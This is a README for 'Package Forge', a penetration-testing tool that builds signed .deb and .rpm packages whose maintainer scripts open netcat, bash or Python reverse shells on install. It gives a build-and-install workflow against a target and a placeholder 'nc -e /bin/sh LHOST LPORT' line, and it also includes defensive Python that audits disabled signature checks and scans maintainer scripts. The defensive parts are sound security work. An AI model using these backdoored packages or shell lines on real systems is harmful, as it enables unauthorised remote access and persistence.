Python, Debian, RPM, GPG, Reverse Shell, Security Utility, CTF, Penetration Testing

Security Utility: Package Forge

A security utility for creating malicious signed deb and rpm packages


Background Knowledge

By default, the apt package manager and related front-ends (apt-get, aptitude) on modern Debian systems require a chain of trust back to a trusted GPG key (typically the official Debian archive key). This is achieved primarily by signing the repository metadata (the Release files, which contain checksums of all packages), not every individual .deb package file.

The rpm package manager uses a similar system.

In most situations this tool cannot be used unless the generated public key can somehow be imported into the target system before the package is installed.

This tool is developed to target a security misconfiguration: systems that have disabled the package signing requirement for installing packages.

This might occur in a development lab environment, or after compromise of a web application that manages packages and installs them insecurely.
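
The misconfiguration described above can be checked for before anyone exploits it. The following Python script is an added example, not part of Package Forge, that audits the settings which disable signature verification on both package managers: apt.conf options such as APT::Get::AllowUnauthenticated and Acquire::AllowInsecureRepositories, [trusted=yes] (or deb822 Trusted: yes) repository entries, and gpgcheck=0 in yum/dnf .repo files. It runs against constructed sample configuration embedded in the script; the path labels and the example.internal hostnames are placeholders, and on a real host you would feed it the contents of /etc/apt/apt.conf.d/*, /etc/apt/sources.list (and sources.list.d) and /etc/yum.repos.d/*.

```python
import configparser
import re

# apt options that bypass signature verification when set to true (real option names)
APT_UNSAFE_OPTIONS = (
    "APT::Get::AllowUnauthenticated",
    "Acquire::AllowInsecureRepositories",
    "Acquire::AllowDowngradeToInsecureRepositories",
)
_APT_OPTION = re.compile(r'^\s*([A-Za-z:]+)\s+"?(true|yes|1)"?\s*;', re.I | re.M)
# one-line sources.list entries carrying a [ ... ] option block
_SOURCE_OPTS = re.compile(r"^\s*deb(?:-src)?\s+\[([^\]]*)\].*$", re.M)
# deb822-style .sources stanzas
_DEB822_TRUSTED = re.compile(r"^Trusted:\s*yes\s*$", re.I | re.M)


def audit_apt_conf(text, path="apt.conf"):
    """Report apt.conf(.d) options that let apt install unsigned or badly signed packages."""
    findings = []
    for m in _APT_OPTION.finditer(text):
        if m.group(1) in APT_UNSAFE_OPTIONS:
            findings.append(f"{path}: {m.group(1)} is set to {m.group(2)}")
    return findings


def audit_apt_sources(text, path="sources.list"):
    """Report repositories that apt has been told to trust without a valid signature."""
    findings = []
    for m in _SOURCE_OPTS.finditer(text):
        opts = [o.strip().lower() for o in m.group(1).split()]
        if "trusted=yes" in opts:
            findings.append(f"{path}: [trusted=yes] entry: {m.group(0).strip()}")
    for m in _DEB822_TRUSTED.finditer(text):
        findings.append(f"{path}: deb822 stanza sets {m.group(0).strip()}")
    return findings


def audit_rpm_repo(text, path="example.repo"):
    """Report yum/dnf repositories with gpgcheck disabled."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    findings = []
    for section in cp.sections():
        value = cp.get(section, "gpgcheck", fallback="1").strip().lower()
        if value in ("0", "false", "no"):
            findings.append(f"{path}: repo [{section}] has gpgcheck disabled")
    return findings


# Constructed sample inputs (placeholders, not taken from any real system)
SAMPLE_APT_CONF = """\
Acquire::Retries "3";
APT::Get::AllowUnauthenticated "true";
"""

SAMPLE_SOURCES = """\
deb http://deb.debian.org/debian bookworm main
deb [arch=amd64 trusted=yes] http://repo.example.internal/debian stable main
"""

SAMPLE_REPO = """\
[base]
name=constructed base repo
baseurl=http://mirror.example.internal/base
gpgcheck=1

[internal-tools]
name=constructed internal repo
baseurl=http://repo.example.internal/tools
gpgcheck=0
"""


def run_audit():
    """Run all three checks on the constructed samples and return the findings."""
    return (audit_apt_conf(SAMPLE_APT_CONF)
            + audit_apt_sources(SAMPLE_SOURCES)
            + audit_rpm_repo(SAMPLE_REPO))


if __name__ == "__main__":
    for line in run_audit():
        print("WARNING:", line)
```

Each constructed sample produces exactly one warning. A host where any of these findings appear on real configuration will accept a package signed with any key, or with no key at all, which is precisely the condition this tool depends on; the fix is to drop the option or re-enable gpgcheck and distribute the repository's genuine signing key instead.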

Package Forge's Purpose

Package Forge is a security research utility designed to create authentically signed .deb (Debian) and .rpm (Red Hat) packages. It automates the generation of GPG keys, the signing process, and the configuration of local verification policies (debsig-verify).

This tool demonstrates how "trusted" packages can be weaponized using maintainer scripts (postinst and %post) to establish persistent access upon installation.
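
Because the mechanism is the maintainer script rather than the package contents, a defender can read those scripts out of a .deb before dpkg ever runs them. The following Python is an added example, not code from Package Forge: it parses the ar container of a .deb, extracts preinst/postinst/prerm/postrm from control.tar.*, and flags lines matching the reverse-shell indicators named on this page (nc -e, /dev/tcp, bash -i, python -c). The package it scans is assembled in memory with a placeholder postinst (LHOST and LPORT are literal placeholders, not an address), and the pattern list is an assumption chosen for this example, not a complete signature set.

```python
import io
import re
import tarfile

AR_MAGIC = b"!<arch>\n"
MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}
# Indicators of a reverse-shell style payload in a maintainer script (assumed list)
SUSPICIOUS_PATTERNS = [
    re.compile(r"\bnc\b.*\s-e\s"),       # netcat with -e, the nc payload this README describes
    re.compile(r"/dev/tcp/"),             # bash network redirection
    re.compile(r"\bbash\s+-i\b"),         # interactive bash handed a socket
    re.compile(r"\bpython3?\s+-c\s"),     # inline python one-liner
]


def ar_members(blob):
    """Yield (name, data) for each member of a classic ar archive such as a .deb."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    pos = len(AR_MAGIC)
    while pos + 60 <= len(blob):
        header = blob[pos:pos + 60]
        if header[58:60] != b"`\n":
            raise ValueError("corrupt ar member header")
        name = header[0:16].decode("ascii").rstrip(" /")   # dpkg pads with spaces, GNU ar adds '/'
        size = int(header[48:58].decode("ascii").strip())
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size & 1)                      # members are padded to an even offset


def maintainer_scripts(deb_bytes):
    """Return {script_name: text} for the maintainer scripts inside control.tar.*"""
    scripts = {}
    for name, data in ar_members(deb_bytes):
        if not name.startswith("control.tar"):
            continue
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
            for member in tar.getmembers():
                base = member.name.lstrip("./")
                if member.isfile() and base in MAINTAINER_SCRIPTS:
                    scripts[base] = tar.extractfile(member).read().decode("utf-8", "replace")
    return scripts


def scan_deb(deb_bytes):
    """Return (script, line_number, pattern, line) for every suspicious line found."""
    findings = []
    for script, text in maintainer_scripts(deb_bytes).items():
        for lineno, line in enumerate(text.splitlines(), 1):
            for pattern in SUSPICIOUS_PATTERNS:
                if pattern.search(line):
                    findings.append((script, lineno, pattern.pattern, line.strip()))
                    break
    return findings


# --- constructed sample package, assembled in memory (not produced by any tool) ---

def _tar_gz(files):
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            data = content.encode()
            info = tarfile.TarInfo(name="./" + name)
            info.size = len(data)
            info.mode = 0o755
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def _ar(members):
    out = bytearray(AR_MAGIC)
    for name, data in members:
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode("ascii")
        out += data + (b"\n" if len(data) & 1 else b"")
    return bytes(out)


def constructed_sample_deb():
    """Minimal .deb whose postinst carries a placeholder netcat line (LHOST/LPORT are not real)."""
    control = ("Package: secure-tool\nVersion: 1.0.0\nArchitecture: amd64\n"
               "Maintainer: constructed\nDescription: constructed sample\n")
    postinst = ("#!/bin/sh\nset -e\n# placeholder payload line for the scanner to find\n"
                "nc -e /bin/sh LHOST LPORT &\nexit 0\n")
    return _ar([
        ("debian-binary", b"2.0\n"),
        ("control.tar.gz", _tar_gz({"control": control, "postinst": postinst})),
        ("data.tar.gz", _tar_gz({})),
    ])


if __name__ == "__main__":
    for script, lineno, pattern, line in scan_deb(constructed_sample_deb()):
        print(f"{script}:{lineno}: matched {pattern!r}: {line}")
```

With the standard tooling, dpkg-deb -e <pkg> <dir> extracts the same control directory; the hand-written ar reader is there so the check also works on a host without dpkg. The equivalent inspection for an RPM is rpm -qp --scripts <pkg>, which prints the %post and related scriptlets without installing anything.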

Key Features

  • Dual Format: Generates both Debian and RPM packages simultaneously.
  • Authentic Signing: Automatically signs packages with a locally generated GPG key.
  • Automated Policy Setup: Configures /etc/debsig/policies for seamless verification.
  • Embedded Payload: Injects non-blocking Netcat/Python/Bash reverse shells.
  • Debug Mode: Provides granular logs for troubleshooting XML DTD and GPG keyring issues.

Project Setup

1. Prerequisites

Ensure your Kali Linux or lab machine has the necessary packaging and signing tools installed:

sudo apt update
sudo apt install -y debsigs debsig-verify rpm gnupg binutils

2. Usage

python3 package_forge.py

usage: package_forge.py [-h] [-b] [-s] [-u] [-d] [--lhost LHOST] [--lport LPORT] [--payload {nc,bash,python}]

Package Forge

options:
  -h, --help            show this help message and exit
  -b, --build           Build and sign packages
  -s, --setup-verify    Setup system trust and verify
  -u, --uninstall       Remove trust settings
  -d, --debug           Verbose logs
  --lhost LHOST
  --lport LPORT
  --payload {nc,bash,python}

Typical workflow:

  1. Set up your Listener: nc -lvnp 4444
  2. Build and Sign: python3 package_gen.py -b -s --lhost 10.10.x.x --lport 4444
  3. Install on Target: sudo dpkg -i dist/secure-tool_1.0.0_amd64.deb

When the -b flag is used to build the packages, the tool prompts you to import the trust certificates and make some system configuration changes on your host. This assumes that you will test the payload on your own system first. Those changes import the key so that we can confirm the payload, signed with our own unofficial key, runs successfully, in case we are able to import our public key on a target. They also reduce the errors shown in cases where the target system does allow installation of packages that are not officially verified.


Troubleshooting

1. GPG Signature Hangs

If the script hangs during the "Signing" phase, ensure gpg-agent isn't stuck:

gpgconf --kill gpg-agent

2. "No applicable policy found"

  • Check Case Sensitivity: Ensure the ID in debsig.pol uses lowercase id=.
  • Verify Directory Name: The policy directory must be the Full Fingerprint (e.g., /etc/debsig/policies/2282...).

Alternative Payloads

If nc -e is missing, use the --payload flag to switch:

  • Bash: python3 package_gen.py -b --payload bash
  • Python: python3 package_gen.py -b --payload python